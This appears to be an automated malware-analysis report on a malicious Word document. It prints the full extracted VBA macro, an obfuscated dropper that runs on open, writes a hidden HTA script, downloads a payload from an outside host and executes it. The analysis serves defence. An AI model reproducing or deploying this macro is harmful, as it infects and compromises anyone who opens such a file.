MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Generic-9823794-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Generic-9823794-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set aY8Ws = CreateObject(amaLIb("e" & "gas" & "sem.odc")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8413 bytes |
SHA-256: 27cf2ab221e14239510256d94562522e88984b4d554688669b2bfaa044256d3d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "awOgue"
Sub AutoOpen()
aaFNS
End Sub
Attribute VB_Name = "aWpfh7"
Sub aIpit(apqzJj, aKCen)
' Wondering prays welding
' South-eastern attract
' Node sicilian many modelling
' Sluggard bail nbc
' Cook closing valencia cringe
' Businesslike
' Randy
' Beginning
' Michel talks clock
' Sold
' Nvidia luscious
End Sub
Attribute VB_Name = "awpiY"
Public Const aOBZCw As String = "21232f297a57a5a743894a0e4a801fc3"
Public Const aWiEfe As String = "utf-8"
Function amaLIb(awrMUs)
a9eFrU = 1
aD32M = Len(awrMUs)
asX0a = ""
For aXdGr = 1 To aD32M
asX0a = Mid(awrMUs, aXdGr, 1) & asX0a
' Program magnesia
' Focus thumbnail studied
' Gorgeous accessing incompetent
' Infringement emphasize blubber
' Chronic crossbow
' Destination
' Country professor peruse
Next aXdGr
' Contacted prostitute
' Rake tons absences lung
' Envelope bridal
' Disorganized spinster mortality
' Greenhouse pedal directory
' Archibald perception illinois stumped optic abbeys
' Necktie dallas lire priceless extracting bankruptcy
' Seafood artistic abridged illogical aniline inferiority
' National this bbs
' Whatever swag productivity apoplexy
' Focus
' Ravages islands loft
' Weblog flows
' Pen detriment mulberry whilst switched boatswain
amaLIb = asX0a
End Function
Function auZIzw(arTWgL)
Set aY8Ws = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
With aY8Ws.BodyPart
' Fatigues end mistakes
' Underwent pursuant
' Nouns challenged
.ContentTransferEncoding = amaLIb("46e" & "sab")
With .GetEncodedContentStream
.WriteText arTWgL
.Flush
End With
With .GetDecodedContentStream
.Charset = aWiEfe
auZIzw = .ReadText
End With
End With
' Inclusive lean-to
' Eucalyptus calabria
' Enormous baker favors
' Circumcision duality orbs entity accompanied
' Impediment hypnotic consumer admonish fantasy forage
' Novels critically propecia clam
' Application scenario
' Ecclesiastes veneer dairy reasons
' Progressive rehabilitation demonstration
' Greensboro
' Cornwall warwickshire
End Function
Sub a6pB2w(abXcW, aBpP3u)
' Compounds relaxation ozone pawn
' Dye durable whatll
' Aquatic grouse sys fifty-one vertically
' Bedford rocket totals
' Nefarious spontaneously pleasant
' Lab
' Cheapest
' Bus gunshot tomato acdbentity
' Floppy checklist offset
' Tile
' Riddled iniquitous images
' Redundant triple eel ford vaulting
' Ad
' Walk transvaal easel
' Olympics anthea
' Abridgment firewood
Open abXcW For Output As #1
Print #1, aBpP3u
Close #1
End Sub
Function Des(aJITH, aCeGcH, aZMIB)
' Connect conservative od python
' Hop
' Census unchecked laden simpson accidents
Des = Replace(auZIzw(aJITH), aCeGcH, aZMIB)
End Function
Sub aaFNS()
agjo3 = Des("Y2FURE1SOmFURE1SXGFURE1Sd2FURE1SaWFURE1SbmFURE1SZGFURE1Sb2FURE1Sd2FURE1Sc2FURE1SXGFURE1Sc2FURE1SeWFURE1Sc2FURE1SdGFURE1SZWFURE1SbWFURE1SM2FURE1SMmFURE1SXGFURE1SbWFURE1Sc2FURE1SaGFURE1SdGFURE1SYWFURE1SLmFURE1SZWFURE1SeGFURE1SZWFURE1S", "aTDMR", "")
auUb2 = Des("Y2FXNDc2bzphVzQ3Nm9cYVc0NzZvdWFXNDc2b3NhVzQ3Nm9lYVc0NzZvcmFXNDc2b3NhVzQ3Nm9cYVc0NzZvcGFXNDc2b3VhVzQ3Nm9iYVc0NzZvbGFXNDc2b2lhVzQ3Nm9jYVc0NzZvXGFXNDc2b3BhVzQ3Nm91YVc0NzZvYmFXNDc2b2xhVzQ3Nm9pYVc0NzZvY2FXNDc2by5hVzQ3Nm9jYVc0NzZvb2FXNDc2b21hVzQ3Nm8=", "aW476o", "")
' Emotional hurries messages
' Contingent humans booking pontiac wean
' Dc tanzania criterion
' Tempestuous foundry minimize repulsion
asrcC = Des("Y2FPOHVBOmFPOHVBXGFPOHVBdWFPOHVBc2FPOHVBZWFPOHVBcmFPOHVBc2FPOHVBXGFPOHVBcGFPOHVBdWFPOHVBYmFPOHVBbGFPOHVBaWFPOHVBY2FPOHVBXGFPOHVBaWFPOHVBbmFPOHVBZGFPOHVBZWFPOHVBeGFPOHVBLmFPOHVBaGFPOHVBdGFPOHVBYWFPOHVB", "aO8uA", "")
' Accomplish warm indeterminate turbo spurn expostulation
' Almanac clean
' Bizrate
' Cakes suggested pave chapter monitor
aXLYx = Des("cmFqeWNMVHVhanljTFRuYWp5Y0xUZGFqeWNMVGxhanljTFRsYWp5Y0xUM2FqeWNMVDJhanljTFQuYWp5Y0xUZWFqeWNMVHhhanljTFRlYWp5Y0xUIGFqeWNMVHVhanljTFRyYWp5Y0xUbGFqeWNMVC5hanljTFRkYWp5Y0xUbGFqeWNMVGxhanljTFQsYWp5Y0xUT2FqeWNMVHBhanljTFRlYWp5Y0xUbmFqeWNMVFVhanljTFRSYWp5Y0xUTGFqeWNMVA==", "ajycLT", "")
' Empirical yields
' Fiftieth plot soc sector whirr doing
' Constellation vanguard young
' Surrounding scared
' Innocent port movement
' Slave cassandra
' Swimmer undress
' Inter piston
' Waken ray
' Query citation et getting overlaid thoughtfulness
' Participation debauchery
aY2hl = "eQ0KCWE1SFZTdy5TYXZlVG9GaWxlIGFxamRvTywgMg0KCWE1SFZTdy5DbG9zZQ0KRW5kIElmDQoNCjwvc2NyaXB0Pg0KDQo8c2NyaXB0IGxhbmd1"
aqhKfj = "c2NyaXB0Ij4NCg0KYVg4UVNJID0gInJ1bmRsbCINCg0KSWYgYVAwMlguc3RhdHVzID0gMjAwIFRoZW4NCglTZXQgYTVIVlN3ID0gQ3JlYXRlT2Jq"
aohGbH = "YnJNcGtaaGZOJkxlalc9ZmxfUWdMaCIsIGZhbHNlKTsNCmFQMDJYLnNlbmQoKTsNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZi"
aokiZq = "b2luKCIiKTsNCnZhciBhMDhFYSA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYWN1RGQgPSAici0gQWdvbGFpRHdv"
avml6a = "Mi54bWxodHRwIik7DQphUDAyWC5vcGVuKCJHRVQiLCAiaHR0cDovL3dmYWl0aDguY29tL2ZvcnVtL3ZpZXdwb3N0LzYxa0tRTl9ZbTBLN3FzdE1z"
' Petrograd authorities
' Prosaic stock auburn
' Prevention supplier advocate
aCFLM = "YWdlPSJqYXZhc2NyaXB0Ij4NCg0KdmFyIGFueFlTUSA9IG5ldyBBY3RpdmVYT2JqZWN0KGFzQW9VMylbYTA4RWFdKGFYOFFTSSArICIzMiAiICsg"
' Certitude
' Heater someone folding lunacy
' Finder capillary chew moisten adonis brunette mitchell
' Nutmeg caliph spaces beauty
atBgP = "ZWN0KCJhZG9kYi5zdHJlYW0iKQ0KCWE1SFZTdy5PcGVuDQoJYTVIVlN3LlR5cGUgPSAxDQoJYTVIVlN3LldyaXRlIGFQMDJYLnJlc3BvbnNlYm9k"
a1feI = "YXFqZG9PICsgYWN1RGQpOw0Kd2luZG93LmNsb3NlKCk7DQoNCjwvc2NyaXB0Pg=="
' Blessed denver
' Palmy nsw wrestling container
' Costumes nominative shiny sending tr
' Genre
aS4Wyd = "aFMsIi5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGFxamRvTyA9ICJjOlxccHJvZ3JhbWRhdGFcXGFMUVpBLnBkZiI7DQoNCndp"
' Pheasant dates intrepid
' Intranet soliloquy burst
' Decor baptismal expedite
' Migrant scathing half emptiness
afd9y = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhc0FvVTMgPSAibGxlaHMudHBpcmNzdyIuc3BsaXQoIiIpLnJldmVyc2UoKS5q"
as34k = "bmRvdy5yZXNpemVUbygxLCAxKTsNCndpbmRvdy5tb3ZlVG8oLTEwLCAtMTApOw0KdmFyIGFQMDJYID0gbmV3IEFjdGl2ZVhPYmplY3QoIm1zeG1s"
a34Km = "YS9SSmpxMDRoNk9Rdks2QmIvZmZzbGFleTk/QW9KPVNfZGpCYyZOd1RHPUp4UEtoS2ZYJk1qPWZVYkFmZXp6SHJzQXJfRCZsSENBPU1yRW1rSXND"
' Constructed heterodox ulcer
' Stilled specifies thirty-seven
' Tap misanthropy bingo studio
' Underlie thereabout actual north-eastern
aBpP3u = auZIzw(afd9y & aokiZq & aS4Wyd & as34k & avml6a & a34Km & aohGbH & aqhKfj & atBgP & aY2hl & aCFLM & a1feI)
a6pB2w asrcC, aBpP3u
' Ul
' Engulf knocker
' Illuminate indiscriminate
' Designer yorkshire central
' Mammoth ez candidly hazard
' Guatemala relevance elsewhere pn aberrations porter
' Remarks ae yemen
' Wt evangelist
' Ff wherever
' Alexandra sicilian si pg decorative st premiere
' Apache saw eskimo
' Alberta cooler minerals comics emmanuel flow
' Uncanny
' Propeller adjacent girt
' Gypsy nearby zealously
' Pentium five titans
' Councillor
' Confounds
' Tgp booby
' Bobby drainage
' Frequencies unconvinced decades urgency
' Dozens
' Feet hitting maidenhead
' Crate loose
' Mote
' Honeymoon unpremeditated
' Survival
aaGbjK = Des("d2EzZzJFdXNhM2cyRXVjYTNnMkV1cmEzZzJFdWlhM2cyRXVwYTNnMkV1dGEzZzJFdS5hM2cyRXVzYTNnMkV1aGEzZzJFdWVhM2cyRXVsYTNnMkV1bGEzZzJFdQ==", "a3g2Eu", "")
CreateObject(aaGbjK).run (aXLYx & " " & asrcC)
End Sub
Attribute VB_Name = "aChxWo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Younger worship
' Clerk buried bb
' Phpbb
' Canon skip snake internship isis
Function azVcvA(aEFAW1)
' Killing gl wright friday respiration
' Obloquy analytic laugh taint
' Newer sloth realtor waif
' Received iron abyssinia benny bhutan
' Inquisitiveness teens cheese
' Protein admissible expenses comments
' King acquisition
' Distort searching statewide coding
' Dwindle trap appearing youth flash noise
' Amazon wellington
' Installations hermes
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 34816 bytes |
SHA-256: d112d07585408e0c5e7570a62b48b9c228831514995ccdf155b5fbc07b621c3c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.